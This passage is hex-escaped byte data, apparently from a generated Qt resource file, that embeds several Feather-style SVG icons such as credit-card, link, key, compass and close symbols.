\x2e\x35\x20\x32\x2e\x36\x37\x20\x31\x34\x20\x33\x2e\x35\x20\x31\
\x34\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x31\x34\x20\x31\x34\x2e\x35\x63\x30\x2d\x2e\
\x38\x33\x2e\x36\x37\x2d\x31\x2e\x35\x20\x31\x2e\x35\x2d\x31\x2e\
\x35\x68\x35\x63\x2e\x38\x33\x20\x30\x20\x31\x2e\x35\x2e\x36\x37\
\x20\x31\x2e\x35\x20\x31\x2e\x35\x73\x2d\x2e\x36\x37\x20\x31\x2e\
\x35\x2d\x31\x2e\x35\x20\x31\x2e\x35\x68\x2d\x35\x63\x2d\x2e\x38\
\x33\x20\x30\x2d\x31\x2e\x35\x2d\x2e\x36\x37\x2d\x31\x2e\x35\x2d\
\x31\x2e\x35\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x31\x35\x2e\x35\x20\x31\x39\x48\x31\
\x34\x76\x31\x2e\x35\x63\x30\x20\x2e\x38\x33\x2e\x36\x37\x20\x31\
\x2e\x35\x20\x31\x2e\x35\x20\x31\x2e\x35\x73\x31\x2e\x35\x2d\x2e\
\x36\x37\x20\x31\x2e\x35\x2d\x31\x2e\x35\x2d\x2e\x36\x37\x2d\x31\
\x2e\x35\x2d\x31\x2e\x35\x2d\x31\x2e\x35\x7a\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x30\
\x20\x39\x2e\x35\x43\x31\x30\x20\x38\x2e\x36\x37\x20\x39\x2e\x33\
\x33\x20\x38\x20\x38\x2e\x35\x20\x38\x68\x2d\x35\x43\x32\x2e\x36\
\x37\x20\x38\x20\x32\x20\x38\x2e\x36\x37\x20\x32\x20\x39\x2e\x35\
\x53\x32\x2e\x36\x37\x20\x31\x31\x20\x33\x2e\x35\x20\x31\x31\x68\
\x35\x63\x2e\x38\x33\x20\x30\x20\x31\x2e\x35\x2d\x2e\x36\x37\x20\
\x31\x2e\x35\x2d\x31\x2e\x35\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x38\x2e\x35\x20\x35\
\x48\x31\x30\x56\x33\x2e\x35\x43\x31\x30\x20\x32\x2e\x36\x37\x20\
\x39\x2e\x33\x33\x20\x32\x20\x38\x2e\x35\x20\x32\x53\x37\x20\x32\
\x2e\x36\x37\x20\x37\x20\x33\x2e\x35\x20\x37\x2e\x36\x37\x20\x35\
\x20\x38\x2e\x35\x20\x35\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x49\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x72\x65\x64\x69\
\x74\x2d\x63\x61\x72\x64\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x31\x22\x20\x79\x3d\x22\x34\x22\x20\x77\x69\x64\x74\x68\x3d\
\x22\x32\x32\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x36\x22\
\x20\x72\x78\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\
\x2f\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\x78\x32\x3d\x22\x32\
\x33\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x5a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x78\x2d\x63\x69\x72\
\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\
\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\
\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x39\
\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x31\x35\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x39\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\
\x31\x35\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x73\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x69\x6e\x6b\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x30\x20\x31\x33\
\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\x20\x37\x2e\x35\x34\x2e\
\x35\x34\x6c\x33\x2d\x33\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\
\x2d\x37\x2e\x30\x37\x2d\x37\x2e\x30\x37\x6c\x2d\x31\x2e\x37\x32\
\x20\x31\x2e\x37\x31\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x34\x20\x31\x31\x61\x35\x20\
\x35\x20\x30\x20\x30\x20\x30\x2d\x37\x2e\x35\x34\x2d\x2e\x35\x34\
\x6c\x2d\x33\x20\x33\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\x20\
\x37\x2e\x30\x37\x20\x37\x2e\x30\x37\x6c\x31\x2e\x37\x31\x2d\x31\
\x2e\x37\x31\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x73\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x6f\x75\x64\
\x2d\x6f\x66\x66\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x32\x32\x2e\x36\x31\x20\x31\x36\x2e\x39\x35\x41\x35\x20\x35\x20\
\x30\x20\x30\x20\x30\x20\x31\x38\x20\x31\x30\x68\x2d\x31\x2e\x32\
\x36\x61\x38\x20\x38\x20\x30\x20\x30\x20\x30\x2d\x37\x2e\x30\x35\
\x2d\x36\x4d\x35\x20\x35\x61\x38\x20\x38\x20\x30\x20\x30\x20\x30\
\x20\x34\x20\x31\x35\x68\x39\x61\x35\x20\x35\x20\x30\x20\x30\x20\
\x30\x20\x31\x2e\x37\x2d\x2e\x33\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\x20\x79\x31\
\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\
\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\xac\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x65\x73\x73\x61\
\x67\x65\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x32\x31\x20\x31\x31\x2e\x35\x61\x38\x2e\x33\
\x38\x20\x38\x2e\x33\x38\x20\x30\x20\x30\x20\x31\x2d\x2e\x39\x20\
\x33\x2e\x38\x20\x38\x2e\x35\x20\x38\x2e\x35\x20\x30\x20\x30\x20\
\x31\x2d\x37\x2e\x36\x20\x34\x2e\x37\x20\x38\x2e\x33\x38\x20\x38\
\x2e\x33\x38\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x38\x2d\x2e\x39\
\x4c\x33\x20\x32\x31\x6c\x31\x2e\x39\x2d\x35\x2e\x37\x61\x38\x2e\
\x33\x38\x20\x38\x2e\x33\x38\x20\x30\x20\x30\x20\x31\x2d\x2e\x39\
\x2d\x33\x2e\x38\x20\x38\x2e\x35\x20\x38\x2e\x35\x20\x30\x20\x30\
\x20\x31\x20\x34\x2e\x37\x2d\x37\x2e\x36\x20\x38\x2e\x33\x38\x20\
\x38\x2e\x33\x38\x20\x30\x20\x30\x20\x31\x20\x33\x2e\x38\x2d\x2e\
\x39\x68\x2e\x35\x61\x38\x2e\x34\x38\x20\x38\x2e\x34\x38\x20\x30\
\x20\x30\x20\x31\x20\x38\x20\x38\x76\x2e\x35\x7a\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x43\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x6f\x67\x67\x6c\
\x65\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x31\x22\x20\x79\x3d\x22\x35\x22\x20\x77\x69\x64\x74\x68\x3d\
\x22\x32\x32\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x34\x22\
\x20\x72\x78\x3d\x22\x37\x22\x20\x72\x79\x3d\x22\x37\x22\x3e\x3c\
\x2f\x72\x65\x63\x74\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\
\x3d\x22\x38\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\
\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x70\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x78\x2d\x73\x71\x75\
\x61\x72\x65\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\
\x20\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\
\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\
\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\
\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x35\x22\x20\x79\
\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\
\x39\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x31\x35\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x60\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6b\x65\x79\x22\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\x32\x6c\x2d\
\x32\x20\x32\x6d\x2d\x37\x2e\x36\x31\x20\x37\x2e\x36\x31\x61\x35\
\x2e\x35\x20\x35\x2e\x35\x20\x30\x20\x31\x20\x31\x2d\x37\x2e\x37\
\x37\x38\x20\x37\x2e\x37\x37\x38\x20\x35\x2e\x35\x20\x35\x2e\x35\
\x20\x30\x20\x30\x20\x31\x20\x37\x2e\x37\x37\x37\x2d\x37\x2e\x37\
\x37\x37\x7a\x6d\x30\x20\x30\x4c\x31\x35\x2e\x35\x20\x37\x2e\x35\
\x6d\x30\x20\x30\x6c\x33\x20\x33\x4c\x32\x32\x20\x37\x6c\x2d\x33\
\x2d\x33\x6d\x2d\x33\x2e\x35\x20\x33\x2e\x35\x4c\x31\x39\x20\x34\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x65\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x75\x70\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\
\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\
\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\
\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x36\x20\x31\x32\x20\x31\x32\x20\x38\
\x20\x38\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\
\x79\x31\x3d\x22\x31\x36\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\
\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x56\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x6d\x70\x61\
\x73\x73\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\
\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\
\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x36\x2e\
\x32\x34\x20\x37\x2e\x37\x36\x20\x31\x34\x2e\x31\x32\x20\x31\x34\
\x2e\x31\x32\x20\x37\x2e\x37\x36\x20\x31\x36\x2e\x32\x34\x20\x39\
\x2e\x38\x38\x20\x39\x2e\x38\x38\x20\x31\x36\x2e\x32\x34\x20\x37\
\x2e\x37\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x2b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x78\x22\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x38\x22\x20\x79\x31\x3d\x22\
\x36\x22\x20\x78\x32\x3d\x22\x36\x22\x20\x79\x32\x3d\x22\x31\x38\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\
\x22\x31\x38\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xe1\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
